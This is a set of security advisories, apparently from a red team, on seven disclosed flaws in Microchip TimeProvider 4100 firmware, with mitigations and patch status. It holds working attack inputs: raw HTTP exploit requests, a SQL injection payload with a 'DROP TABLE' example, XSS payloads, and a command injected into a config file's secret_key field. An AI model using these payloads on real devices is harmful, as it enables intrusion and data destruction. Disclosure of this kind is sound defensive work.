CVE-2024-43685: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - Improper Authentication Vulnerability (Session Fixation)

The final finding from the analysis of the "TimeProvider 4100 Grandmaster" device revealed a Session Fixation vulnerability.

TimeProvider 4100 Grandmaster Device

The root of the issue lies in how the device manages user session cookies.

Specifically, the web interface issues a session cookie ci_session prior to user authentication, and this same cookie is retained and reused after login. The device does not regenerate the session identifier upon successful authentication, allowing a previously established session to become fully authenticated once a user logs in.

This creates a serious security risk: an attacker who can obtain or assign a session cookie to a victim before authentication can later hijack the session after the user logs in, without needing credentials.

Exploitation Steps

This vulnerability can be exploited through a Session Fixation attack using the following steps:

1. The attacker initiates a session with the device and receives a valid ci_session cookie.

2. The attacker sends the cookie to the victim, often through a phishing link or malicious iframe that sets the attacker-controlled session in the victim’s browser.

3. The victim logs in to the device’s web interface while using the attacker-provided session.

4. The session becomes authenticated—but the session ID has not changed, so the attacker can now reuse the same cookie to gain authenticated access as the victim.

Even after the user logs out, if the session is not properly invalidated server-side, the session may remain active or exploitable. 

Following the previously outlined details, the results of each step taken to exploit the vulnerability are presented below. The image illustrates a login request where the ci_session cookie is assigned an arbitrary value matching the length of the original session cookie:

After the login operation is completed, the device’s web server retains the same session cookie value. The following image illustrates this behavior during a request to the dashboard web resource:

 The image below demonstrates the outcome of this session hijacking attack: 

Key Proof-of-Concept Insight:

• The attacker does not need to know the victim’s credentials.

• They only need to ensure the victim authenticates using a session ID under the attacker’s control.

Recommended Mitigations:

• Regenerate the session ID immediately upon successful login to ensure session isolation.

• Invalidate session tokens upon logout and clear session data from memory.

• Use secure cookie attributes (Secure, HttpOnly, SameSite) to reduce client-side exposure.

• Monitor for reused or long-lived session IDs across IPs or geolocations.

Conclusion:

This vulnerability highlights a critical failure in session lifecycle management. By failing to regenerate session identifiers after login, the system is left open to session fixation attacks—making it possible for attackers to impersonate authenticated users without needing credentials.

Reporting Information:

CVE Identifier: CVE-2024-43685

CVSS Score: 8.7
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43685
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-session-token-fixation
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

CVE-2024-43687: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER DEVICE (BANNER) - STORED XSS

Carrying on with the analysis of the "TimeProvider 4100 grandmaster device", it was possible to find out a Stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. 

TimeProvider 4100 Grandmaster Device

The embedded webserver does not perform input sanitization on the "txtcustom" parameter and saves such value inside the database. Users able to visit the device web administration interface will find out the malicious JavaScript payload included in the related server responses and furthermore, it will be executed on the victim's browser. 

Exploitation Steps

1. Authenticate to the device’s management web interface.

2. Open the banner configuration panel.

3. Select the "custom banner" feature.

4. Insert the malicious JavaScript payload.

5. Apply and save the system configuration containing the custom banner.

6. Trigger execution by connect to the device's web management interface. Victims connection action initiates execution of the injected javascript payload.

The following image shows an example of a request containing the malicious JavaScript payload:

Request RAW:

POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"
1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="txtcustom"

[malicious JavaScript payload]

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="action"
applybanner
-----------------------------9680247575877256312575038502--

# End

Payload execution on the victim’s browser:

By performing a login operation into the device SSH service, it is possible to view the injected malicious Javascript payload. Following an example of such connection:

Conclusion:

A threat actor that exploits this vulnerability is able to perform phishing attacks and session hijacking compromising in this way the confidentiality, integrity and availability of the device.

Reporting Information:

CVE Identifier: CVE-2024-43687

CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52120

CVE-2024-43683: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - URL REDIRECTION TO UNTRUSTED SITE ('Open Redirect') – CWE-601

Proceeding with the analysis of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device, it was possible to identify a Host Header Injection vulnerability.

TimeProvider 4100 Grandmaster Device

The device fails to properly validate the Host header in HTTP GET and POST requests. This allows attackers to craft requests with arbitrary Host values, which the system accepts and processes without verification.

In observed cases, replacing the legitimate Host header with a malicious domain (e.g., pentester.com) results in the device accepting the request and redirecting users to the attacker-controlled domain.

This issue can be exploited to:

• Perform phishing attacks by redirecting users to malicious websites that appear legitimate

• Bypass access controls or URL-based filters in certain environments

• Facilitate cache poisoning or other injection-based attacks

Since the device does not verify that the Host header matches its own hostname or expected domain, it becomes vulnerable to these types of manipulations.

Exploitation Steps

Here’s how an attacker could exploit this vulnerability:

1. Craft an HTTP request (GET or POST) targeting the TimeProvider 4100’s web interface.

2. Replace the Host header with a malicious domain under the attacker’s control—for example: Host: pentester.com

3. Send the request to the device.

4. The device processes the request and redirects the user to the attacker-specified domain.

5. The victim may unknowingly land on a malicious page designed to mimic the legitimate interface or capture credentials.

This redirection can occur in browsers or applications that use absolute URLs based on the Host header, making it particularly dangerous in environments where external links are passed through the device.

The following image shows an example of a request containing a custom Host header owned by a malicious user. It's also possible to verify that the browser automatically redirects to the specified domain:

Request RAW:

GET /dashboard HTTP/1.1
Host: pentester.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

Recommendations:

• Implement strict server-side validation of the Host header against an expected allowlist.

• Reject or log requests with unexpected Host values.

• Ensure any redirections or URL generations use fixed, server-side hostnames rather than user-supplied headers.

• Apply firmware updates once an official patch is made available by Microchip.

Conclusion:

This vulnerability highlights a common but serious oversight: trusting user-supplied HTTP headers without validation. Host header injection can be leveraged for phishing, redirection, and other malicious activities—all without requiring access or authentication.

Reporting Information:

CVE Identifier: CVE-2024-43683

CVSS Score: 6.1
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-improper-verification-of-host-header

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

CVE-2024-7801: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - UNAUTHENTICATED SQL INJECTION

Starting a deep analysis of the "TimeProvider 4100 grandmaster" device firmware resulted in a SQL Injection vulnerability, specifically within the get_chart_data web resource. 

The vulnerability arises from the improper handling of the channelId parameter, which is inserted directly into an SQL query (SQLite) without sanitization or validation.

TimeProvider 4100 Grandmaster Device

More critically, the channelId parameter is used to dynamically specify the table name in the SQL FROM clause. This design flaw allows unauthenticated attackers to manipulate the query structure, leading to arbitrary SQL execution on the device.

Successful exploitation could allow a threat actor to:

• Extract sensitive internal data

• Enumerate or alter database contents

• Potentially affect system behavior depending on how data is used by other services

The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.

Exploitation Steps

An attacker could exploit this vulnerability using the following approach:

1. Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.

2. Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.

   • Example: Supplying a payload such as channelId=temperature_data; DROP TABLE logs;-- may result in destructive behavior depending on backend protections.

3. Receive response data containing unintended results or confirmation of executed SQL commands.

An example of a malicious SQL payload is provided below:

SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--

Request RAW:

POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=

1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

# End

Conclusion:

This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.

Reporting Information:

CVE Identifier: CVE-2024-7801

CVSS Score: 6.3
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52122

CVE-2024-9054: MICROCHIP TIMEPROVIDER® 4100 GRANDMASTER CONFIG FILE - REMOTE CODE EXECUTION (RCE)

Continuing with the analysis of the "TimeProvider 4100 grandmaster device", a Remote Code Execution (RCE) vulnerability has been identified.

TimeProvider 4100 Grandmaster Device

The issue stems from the improper handling of user input within the device’s configuration file, specifically the <secret_key> XML tag.

An attacker with access to the device’s management web interface can modify the configuration file to include a malicious payload in the secret_key field. When this modified configuration is uploaded and restored, the payload remains dormant until a login attempt is made through any active service such as SSH, Telnet, or the console interface. 

Upon login, the system processes the malicious payload, leading to execution of arbitrary operating system commands with the privileges of the underlying system.

Exploitation Steps

1. Authenticate to the device’s management web interface.

2. Download the current configuration file from the interface.

3. Modify the <secret_key> field in the configuration file, inserting a malicious OS command or script.

4. Save the modified configuration file.

5. Restore and apply the configuration using the device’s upload function.

6. Trigger execution by logging in through any enabled service (e.g., SSH, Telnet, or the console). This login action initiates execution of the injected command.

An example of a malicious XML configuration file is provided below:

<?xml version="1.0"?>
[...]
 <security>
    [...]
	<server>
        	<ip>192.168.1.1</ip>
        	<secret_key>`ping 192.168.1.20`</secret_key>
        	[...]
      	</server>
    [...]
 </security>
[...]

Request RAW:

POST /config_restore HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
Content-Length: 206640
Origin: https://[device IP]
Referer: https://[device IP]/configbackuprestore
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
Content-Type: text/plain
[XML configuration file containing the injection on "secret_key" tag]

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="pword"

[Web account password in clear-text]
-----------------------------182708909322642582691204887002--

# End

Conclusion:

This vulnerability can result in full system compromise, allowing an attacker to execute unauthorized commands, establish root persistent access, or disrupt normal device operation.

Reporting Information:

CVE Identifier: CVE-2024-9054

CVSS Score: 8.5
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52119

CVE-2024-43686: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING XSS

Coming across the administrative interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device. 

TimeProvider 4100 Grandmaster Device

There was a particular parameter channelId that resulted in reflecting its content in the embedded web server responses. Specifically, the request that deals with updating the charts.

Going forward in this way, after several attempts, it was possible to inject a JavaScript payload between <scripts> tags, resulting in a Reflected Cross-site Scripting Vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:

Request RAW:

POST /get_chart_data HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: https://XXX.XXX.XXX.XXX
Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd

Payload execution on the victim’s browser:

Conclusion:

An unauthenticated user can insert JavaScript snippets in channelId parameter on the specified POST request to the web resource get_chart_data. In the worst case, attackers will be able to perform privileged operations by stealing administrative user’s session or gain access to sensitive information belonging to the user. 

 

Reporting Information:

CVE Identifier: CVE-2024-43686

CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

CVE-2024-43684: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - CROSS-SITE REQUEST FORGERY (CSRF) - CWE-352

Proceeding with the analysis of the "TimeProvider 4100 grandmaster" device, it was possible to find out a Cross-Site Request Forgery (CSRF) vulnerability.

TimeProvider 4100 Grandmaster Device

The device’s web interface does not implement Anti-CSRF token, leaving it susceptible to malicious requests being submitted on behalf of an authenticated user.

CSRF attacks exploit the trust a web application places in a user’s browser. Without CSRF protections in place, an attacker can craft a malicious web page that, when visited by an authenticated user, silently sends unauthorized requests to the device—executing actions with the user’s privileges.

In this case, the vulnerability allows attackers to modify system parameters or UI elements without user consent. 

For example, the following proof-of-concept (PoC) demonstrates changing the web interface banner to display the text “CSRFATTACK”.

CSRF Attack PoC

Exploitation Steps

An attacker could exploit this vulnerability as follows:

1. The victim logs into the TimeProvider 4100 web interface and retains an active session.

2. The victim visits a malicious webpage crafted by the attacker.

3. The page contains hidden HTML or JavaScript code that issues an authenticated request to the device (e.g., modifying configuration or display elements).

4. The device processes the request, assuming it was legitimately issued by the user.

The following image shows the device's web interface banner modified as a result of the CSRF attack:

Recommended Mitigations:

• Implement anti-CSRF tokens in all state-changing HTTP requests to ensure they originate from legitimate sources.

• Use the SameSite attribute in cookies to reduce cross-origin request risks.

• Educate users to avoid visiting untrusted links while logged into administrative systems.

• Restrict access to the device’s web interface to only trusted networks and users.

Conclusion:

The lack of anti-CSRF protection in the TimeProvider 4100 introduces a significant security risk, especially in environments where the web interface is exposed to internal or external users. This vulnerability can lead to unauthorized configuration changes, potential system misuse, and undermines the integrity of user actions.

Reporting Information:

CVE Identifier: CVE-2024-43684

CVSS Score: 8.8
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43684
Vendor Reference:https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-cross-site-request-forgery
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.